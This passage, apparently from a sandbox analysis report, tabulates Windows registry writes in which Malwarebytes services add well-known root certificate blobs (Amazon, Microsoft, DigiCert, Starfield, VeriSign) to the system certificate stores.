62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5A8CEF45D7A69859767A8C8B4496B578CF474B1A\Blob = 0300000001000000140000005a8cef45d7a69859767a8c8b4496b578cf474b1a2000000001000000450500003082054130820329a0030201020213066c9fd29635869f0a0fe58678f85b26bb8a37300d06092a864886f70d01010c05003039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412032301e170d3135303532363030303030305a170d3430303532363030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f74204341203230820222300d06092a864886f70d01010105000382020f003082020a0282020100ad969f2d9c4a4c4a81795199ec8acb6b605113bc4d6d06fcb0088ddd19106ac7260c35d8c06f2084e994b19b8503c35bdb4ae8c8f89076d95b4fe34ce806364dcc9aac3d0c902b92d4061960ac374479858182ad5a37e00dcc9da64c5276ea439db704d150f655e0d5d2a64985e937e9ca7eae5c954d489a3fae205a6d8895d934b8521a4390b0bf6c05b9b678b7ead0e43a3c125362ff4af27bbe3505a91234e3f36474622c3d00495a28fe3244bb87dd652702713bda4af71fdacdf72155904f0fecae82e19f6bd945d3bbf05f87ed3c2c3986da3fdeec7255eb79a3addbdd7cb0ba1ccefcde4f3576cf0ff8781f6a36514627615be99ecff0a2557d7c258a6f2fb4c5cf842e2bfd0d51106cfb5f1bbc1b7ec5ae3b98013192ff0b57f49ab2b957e9abef0d76d1f0eef4ce86a7e06ee9b469a1df69f633c6692e97139ea587b057108137c953b3bb7ff692d19cd018f4926eda834fa663994ca5fb5eef21647a205f6c648515cb37e9620c0b2a16dc012e32da3e4bf59e3af6174094ef9e910886fabe63a85a33eccb744395f96c695236c7296ffc55035c1ffb9fbd47ebe74947950b4e89220949e0f5611ef1bf2e8a726e8059ff573af97532a34e5feced2862d94d73f2cc811760edcdebdcdba7cac57e02bdf2540854fdb42d092c17544a98d154e1516708d2ed6e7e6f3fd22d81592966cb903995111e7427feddebaf0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414b00cf04c30f405580248fd33e552af4b84e36652300d06092a864886f70d01010c05000382020100aaa8808f0e78a3e0a2d4cde6f5987a3bea0003b0970e93bc5aa8f62c8c7287a9b1fc7f73fd637178a58759cf30e10d10b2135a6d82f56ae6809fa0050b68e4476bc76adfb6fd773272e518fa09f4a0932c5dd28c75857665900c0379b7312363ad788309866884cafff9cf269a9279e7cd4bc5e761a717cbf3a91293936ba7e82f5392c46058b0cc0251185b858d625963b6adb4de9afb26f70027c05d55377499c9507fe3592e44e32c25eeec4c3277b49f1ae94b5d20c5dafd1c8716c643e8d4bb269a45705ea90b3753e2467b27fde046f289b7cc42b6cb28266ed9a5c93ac8411360f7508c15aeb26d1a151a5778e6922ad96590823f6c02afae123a27963604d71da28063a99bf1e5bab47c14b04ec9b11f745f38f651ea9bfa2ca211d4a92d271a45b1afb24e710dc05846d66906cb53cbb3fe6b41cd417e7d4c0f7c72797a59cd5e4a0eac9ba99873797cb4f4ccb9b8070cb2745cb8c76f88a190a7f4aaf9bf673af41a15621eb79fbe3db129af67a112f25810195303301bb81a89f69cbd97038ea309f31d8b21f1b4dfe41cd19f650206ea5cd613b384efa2a55c8c7729a768c06bae40d2a8b4eacdf08d4b389c199a1b2854b88990efca75813e1ef26424c718af4eff479e07f63565a4d30a56fff517646cefa822254993b6df0017da587e5deec51bb0d1d15f2110c7f9f3ba020a2707c5f1d6c7d3e0fb09606c | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0D44DD8C3C8C1A1A58756481E90F2E2AFFB3D26E | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 040000000100000010000000be954f16012122448ca8bc279602acf5140000000100000014000000c87ed26a852a1bca1998040727cf50104f68a8a2030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa20f000000010000003000000041ce925678dfe0ccaa8089263c242b897ca582089d14e5eb685fca967f36dbd334e97e81fd0e64815f851f914ade1a1e1900000001000000100000009f687581f7ef744ecfc12b9cee6238f12000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E\Blob = 030000000100000014000000b51c067cee2b0c3df855ab2d92f4fe39d4e70f0e2000000001000000e1030000308203dd308202c5a003020102020100300d06092a864886f70d01010b050030818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d204732301e170d3039303930313030303030305a170d3337313233313233353935395a30818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bdedc103fcf68ffc02b16f5b9f48d99d79e2a2b703615618c347b6d7ca3d352e8943f7a1699bde8a1afd13209cb44977322956fdb9ec8cdd22fa72dc276197eef65a84ec6e19b9892cdc845bd574fb6b5fc589a51052894655f4b8751ce67fe454ae4bf85572570219f8177159eb1e280774c59d48be6cb4f4a4b0f364377992c0ec465e7fe16d534c62afcd1f0b63bb3a9dfbfc7900986174cf26824063f3b2726a190d99cad40e75cc37fb8b89c159f1627f5fb35f6530f8a7b74d765a1e765e34c0e89656998ab3f07fa4cdbddc32317c91cfe05f11f86baa495cd19994d1a2e3635b0976b55662e14b741d96d426d4080459d0980e0ee6defcc3ec1f90f10203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147c0c321fa7d9307fc47d68a362a8a1ceab075b27300d06092a864886f70d01010b050003820101001159fa254f036f94993b9a1f828539d47605945ee128936d625d09c2a0a8d4b07538f1346a9de49f8a862651e62cd1c62d6e95204a9201ecb88a677b31e2672e8c9503262e439d4a31f60eb50cbbb7e2377f22ba00a30e7b52fb6bbb3bc4d379514ecd90f4670719c83c467a0d017dc558e76de68530179a24c410e004f7e0f27fd4aa0aff421d37ed94e5645912207738d3323e3881759673fa688fb1cbce1fc5ecfa9c7ecf7eb1f1072db6fcbfcaa4bfd097054abcea18280290bd5478092171d3d17d1dd916b0a9613dd00a0022fcc77bcb0964450b3b4081f77d7c32f598ca588e7d2aee90597364f936745e25a1f566052e7f3915a92afb508b8e8569f4 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa22000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\1C58A3A8518E8759BF075B76B750D4F2DF264FCD\Blob = 0300000001000000140000001c58a3a8518e8759bf075b76b750d4f2df264fcd2000000001000000c2040000308204be308203a6a003020102021006d8d904d5584346f68a2fa754227ec4300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3231303431343030303030305a170d3331303431333233353935395a304f310b300906035504061302555331153013060355040a130c446967694365727420496e633129302706035504031320446967694365727420544c53205253412053484132353620323032302043413130820122300d06092a864886f70d01010105000382010f003082010a0282010100c14bb3654770bcdd4f58dbec9cedc366e51f311354ad4a66461f2c0aec6407e52edcdcb90a20eddfe3c4d09e9aa97a1d8288e51156db1e9f58c251e72c340d2ed292e156cbf1795fb3bb87ca25037b9a52416610604f571349f0e8376783dfe7d34b674c2251a6df0e9910ed57517426e27dc7ca622e131b7f238825536fc13458008b84fff8bea75849227b96ada2889b15bca07cdfe951a8d5b0ed37e236b4824b62b5499aecc767d6e33ef5e3d6125e44f1bf71427d58840380b18101faf9ca32bbb48e278727c52b74d4a8d697dec364f9cace53a256bc78178e490329aefb494fa415b9cef25c19576d6b79a72ba2272013b5d03d40d321300793ea99f50203010001a38201823082017e30120603551d130101ff040830060101ff020100301d0603551d0e04160414b76ba2eaa8aa848c79eab4da0f98b2c59576b9f4301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b06010505070302307606082b06010505070101046a3068302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304006082b060105050730028634687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274476c6f62616c526f6f7443412e63727430420603551d1f043b30393037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274476c6f62616c526f6f7443412e63726c303d0603551d2004363034300b06096086480186fd6c02013007060567810c01013008060667810c0102013008060667810c0102023008060667810c010203300d06092a864886f70d01010b050003820101008032ce5e0bdd6e5a0d0aafe1d684cbc08efa8570edda5db30cf72b7540fe850afaf33178b7704b1a8958ba80bdf36b1de97ecf0bba589c59d490d3fd6cfdd0986db771825bcf6d0b5a09d07bdec443d82aa4de9e41265fbb8f99cbddaee1a86f9f87fe74b71f1b20abb14fc6f5675d5d9b3ce9ff69f7616cd6d9f3fd36c6ab038876d24b2e7586e3fcd8557d26c21177df3e02b67cf3ab7b7a86366fb8f7d89371cf86df7330fa7babed2a59c842843b11171a52f3c90e147da25b7267ba71ed574766c5b8024a65345e8bd02a3c209c51994ce7529ef76b112b0d927e1de88aeb36164387ea2a63bf753febdec403bb0a3cf730efebaf4cfc8b3610733ef3a4 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob = 040000000100000010000000cb17e431673ee209fe455793f30afa1c0f0000000100000014000000e91e1e972b8f467ab4e0598fa92285387dee94c953000000010000006300000030613021060b6086480186f8450107170630123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c07f000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030109000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703016200000001000000200000009acfab7e43c8d880d06b262a94deeee4b4659989c3d0caf19baf6405e41ab7df1400000001000000140000007fd365a7c2ddecbbf03009f34339fa02af3331330b000000010000001200000056006500720069005300690067006e0000001d0000000100000010000000c6cbcafa17955c4cfd41eca0c654c3617e000000010000000800000000c0032f2df8d6016800000001000000000000000300000001000000140000004eb6d578499b1ccf5f581ead56be3d9b6744a5e5190000000100000010000000d8b5fb368468620275d142ffd2aade372000000001000000d7040000308204d3308203bba003020102021018dad19e267de8bb4a2158cdcc6b3b4a300d06092a864886f70d01010505003081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d204735301e170d3036313130383030303030305a170d3336303731363233353935395a3081ca310b300906035504061302555331173015060355040a130e566572695369676e2c20496e632e311f301d060355040b1316566572695369676e205472757374204e6574776f726b313a3038060355040b1331286329203230303620566572695369676e2c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79314530430603550403133c566572695369676e20436c6173732033205075626c6963205072696d6172792043657274696669636174696f6e20417574686f72697479202d20473530820122300d06092a864886f70d01010105000382010f003082010a0282010100af240808297a359e600caae74b3b4edc7cbc3c451cbb2be0fe2902f95708a364851527f5f1adc831895d22e82aaaa642b38ff8b955b7b1b74bb3fe8f7e0757ecef43db66621561cf600da4d8def8e0c362083d5413eb49ca59548526e52b8f1b9febf5a191c23349d843636a524bd28fe870514dd189697bc770f6b3dc1274db7b5d4b56d396bf1577a1b0f4a225f2af1c926718e5f40604ef90b9e400e4dd3ab519ff02baf43ceee08beb378becf4d7acf2f6f03dafdd759133191d1c40cb7424192193d914feac2a52c78fd50449e48d6347883c6983cbfe47bd2b7e4fc595ae0e9dd4d143c06773e314087ee53f9f73b8330acf5d3f3487968aee53e825150203010001a381b23081af300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106306d06082b0601050507010c0461305fa15da05b3059305730551609696d6167652f6769663021301f300706052b0e03021a04148fe5d31a86ac8d8e6bc3cf806ad448182c7b192e30251623687474703a2f2f6c6f676f2e766572697369676e2e636f6d2f76736c6f676f2e676966301d0603551d0e041604147fd365a7c2ddecbbf03009f34339fa02af333133300d06092a864886f70d0101050500038201010093244a305f62cfd81a982f3deadc992dbd77f6a5792238ecc4a7a07812ad620e457064c5e797662d98097e5fafd6cc2865f201aa081a47def9f97c925a0869200dd93e6d6e3c0d6ed8e606914018b9f8c1eddfdb41aae09620c9cd64153881c994eea284290b136f8edb0cdd2502dba48b1944d2417a05694a584f60ca7e826a0b02aa251739b5db7fe784652a958abd86de5e8116832d10ccdefda8822a6d281f0d0bc4e5e71a2619e1f4116f10b595fce7420532dbce9d515e28b69e85d35befa57d4540728eb70e6b0e06fb33354871b89d278bc4655f0d86769c447af6955cf65d320833a454b6183f685cf2424a853854835fd1e82cf2ac11d6a8ed636a | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8DA7F965EC5EFC37910F1C6E59FDC1CC6A6EDE16\Blob = 0300000001000000140000008da7f965ec5efc37910f1c6e59fdc1cc6a6ede162000000001000000450300003082034130820229a0030201020213066c9fcf99bf8c0a39e2f0788a43e696365bca300d06092a864886f70d01010b05003039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412031301e170d3135303532363030303030305a170d3338303131373030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f74204341203130820122300d06092a864886f70d01010105000382010f003082010a0282010100b2788071ca78d5e371af478050747d6ed8d78876f49968f7582160f97484012fac022d86d3a0437a4eb2a4d036ba01be8ddb48c80717364cf4ee8823c73eeb37f5b519f84968b0ded7b976381d619ea4fe8236a5e54a56e445e1f9fdb416fa74da9c9b35392ffab02050066c7ad080b2a6f9afec47198f503807dca2873958f8bad5a9f948673096ee94785e6f89a351c0308666a14566ba54eba3c391f948dcffd1e8302d7d2d747035d78824f79ec4596ebb738717f2324628b843fab71daacab4f29f240e2d4bf7715c5e69ffea9502cb388aae50386fdbfb2d621bc5c71e54e177e067c80f9c8723d63f40207f2080c4804c3e3b24268e04ae6c9ac8aa0d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604148418cc8534ecbc0c94942e08599cc7b2104e0a08300d06092a864886f70d01010b0500038201010098f2375a4190a11ac57651282036230eaee628bbaaf894ae48a4307f1bfc248d4bb4c8a197f6b6f17a70c85393cc0828e39825cf23a4f9de21d37c8509ad4e9a753ac20b6a897876444718656c8d418e3b7f9acbf4b5a750d7052c37e8034bade961a0026ef5f2f0c5b2ed5bb7dcfa945c779e13a57f52ad95f2f8933bde8b5c5bca5a525b60af14f74befa3fb9f40956d3154fc42d3c7461f23add90f48709ad9757871d1724334756e5759c2025c266029cf2319168e8843a5d4e4cb08fb231143e843297262a1a95d5e08d490aeb8d8ce14c2d055f286f6c49343776661c0b9e841d7977860036e4a72aea5d17dba109e866c1b8ab95933f8ebc490bef1b9 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a48